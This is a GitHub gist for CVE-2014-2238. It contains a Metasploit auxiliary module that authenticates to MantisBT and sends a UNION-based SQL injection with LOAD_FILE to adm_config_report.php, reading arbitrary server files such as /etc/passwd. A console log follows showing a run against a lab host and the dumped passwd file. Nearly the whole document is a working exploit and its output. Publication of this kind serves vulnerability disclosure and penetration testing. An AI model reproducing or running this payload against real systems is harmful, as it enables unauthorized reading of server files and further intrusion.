Last active
August 29, 2015 13:56
-
-
Save brandonprry/9330240 to your computer and use it in GitHub Desktop.
CVE-2014-2238
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This file is part of the Metasploit Framework and may be subject to | |
# redistribution and commercial restrictions. Please see the Metasploit | |
# Framework web site for more information on licensing and terms of use. | |
# http://metasploit.com/framework/ | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Auxiliary | |
Rank = GoodRanking | |
include Msf::Exploit::Remote::HttpClient | |
def initialize(info={}) | |
super(update_info(info, | |
'Name' => "MantisBT Admin SQL Injection Arbitrary File Read", | |
'Description' => %q{ | |
}, | |
'License' => MSF_LICENSE, | |
'Author' => | |
[ | |
], | |
'References' => | |
[ | |
], | |
'Platform' => ['win', 'linux'], | |
'Privileged' => false, | |
'DisclosureDate' => "Feb 28 2014")) | |
register_options( | |
[ | |
OptString.new('FILE', [ true, 'Path to remote file', '/etc/passwd']), | |
OptString.new('USERNAME', [ true, 'Single username', 'administrator']), | |
OptString.new('PASSWORD', [ true, 'Single password', 'password']), | |
OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/']) | |
], self.class) | |
end | |
def run | |
post = { | |
'return' => 'index.php', | |
'username' => datastore['USERNAME'], | |
'password' => datastore['PASSWORD'], | |
'secure_session' => 'on' | |
} | |
resp = send_request_cgi({ | |
'uri' => normalize_uri(target_uri.path, '/login.php'), | |
'method' => 'POST', | |
'vars_post' => post | |
}) | |
cookie = resp.get_cookies | |
filepath = datastore['FILE'].unpack("H*")[0] | |
resp = send_request_cgi({ | |
'uri' => normalize_uri(target_uri.path, '/adm_config_report.php'), | |
'method' => 'POST', | |
'data' => "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27+UNION+ALL+SELECT+11%2C11%2C11%2C11%2CCONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE%280x#{filepath}%29%29+AS+CHAR%29%2C0x20%29%2C0x7169727071%29%2C11%23&apply_filter_button=Apply+Filter", | |
'cookie' => cookie, | |
}) | |
resp.body =~ /qgjuq(.*)qirpq/ | |
file = [$1].pack("H*") | |
print_good(file) | |
end | |
end | |
__END__ | |
bperry@ubuntu:~/tools/metasploit-framework$ ./msfconsole | |
Call trans opt: received. 2-19-98 13:24:18 REC:Loc | |
Trace program: running | |
wake up, Neo... | |
the matrix has you | |
follow the white rabbit. | |
knock, knock, Neo. | |
(`. ,-, | |
` `. ,;' / | |
`. ,'/ .' | |
`. X /.' | |
.-;--''--.._` ` ( | |
.' / ` | |
, ` ' Q ' | |
, , `._ \ | |
,.| ' `-.;_' | |
: . ` ; ` ` --,.._; | |
' ` , ) .' | |
`._ , ' /_ | |
; ,''-,;' ``- | |
``-..__``--` | |
http://metasploit.pro | |
=[ metasploit v4.8.0-dev [core:4.8 api:1.0] | |
+ -- --=[ 1178 exploits - 649 auxiliary - 186 post | |
+ -- --=[ 312 payloads - 30 encoders - 8 nops | |
msf > use auxiliary/gather/mantisbt_admin_sqli | |
msf auxiliary(mantisbt_admin_sqli) > set RHOST 172.31.16.109 | |
RHOST => 172.31.16.109 | |
msf auxiliary(mantisbt_admin_sqli) > set TARGETURI /mantisbt-1.2.16/ | |
TARGETURI => /mantisbt-1.2.16/ | |
msf auxiliary(mantisbt_admin_sqli) > set PASSWORD password | |
PASSWORD => password | |
msf auxiliary(mantisbt_admin_sqli) > show options | |
Module options (auxiliary/gather/mantisbt_admin_sqli): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
FILE /etc/passwd yes Path to remote file | |
PASSWORD password yes Single password | |
Proxies no Use a proxy chain | |
RHOST 172.31.16.109 yes The target address | |
RPORT 80 yes The target port | |
TARGETURI /mantisbt-1.2.16/ yes Relative URI of MantisBT installation | |
USERNAME administrator yes Single username | |
VHOST no HTTP server virtual host | |
msf auxiliary(mantisbt_admin_sqli) > run | |
[+] root:x:0:0:root:/root:/bin/bash | |
daemon:x:1:1:daemon:/usr/sbin:/bin/sh | |
bin:x:2:2:bin:/bin:/bin/sh | |
sys:x:3:3:sys:/dev:/bin/sh | |
sync:x:4:65534:sync:/bin:/bin/sync | |
games:x:5:60:games:/usr/games:/bin/sh | |
man:x:6:12:man:/var/cache/man:/bin/sh | |
lp:x:7:7:lp:/var/spool/lpd:/bin/sh | |
mail:x:8:8:mail:/var/mail:/bin/sh | |
news:x:9:9:news:/var/spool/news:/bin/sh | |
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh | |
proxy:x:13:13:proxy:/bin:/bin/sh | |
www-data:x:33:33:www-data:/var/www:/bin/sh | |
backup:x:34:34:backup:/var/backups:/bin/sh | |
list:x:38:38:Mailing List Manager:/var/list:/bin/sh | |
irc:x:39:39:ircd:/var/run/ircd:/bin/sh | |
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh | |
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh | |
libuuid:x:100:101::/var/lib/libuuid:/bin/sh | |
syslog:x:101:103::/home/syslog:/bin/false | |
messagebus:x:102:104::/var/run/dbus:/bin/false | |
bperry:x:1000:1000:Brandon Perry,,,:/home/bperry:/bin/bash | |
avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false | |
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false | |
dnsmasq:x:105:65534:dnsmasq,,,:/var/lib/misc:/bin/false | |
whoopsie:x:106:114::/nonexistent:/bin/false | |
avahi:x:107:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false | |
colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false | |
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false | |
pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false | |
rtkit:x:111:121:RealtimeKit,,,:/proc:/bin/false | |
saned:x:112:122::/home/saned:/bin/false | |
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh | |
lightdm:x:114:123:Light Display Manager:/var/lib/lightdm:/bin/false | |
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false | |
mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false | |
[*] Auxiliary module execution completed | |
msf auxiliary(mantisbt_admin_sqli) > |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment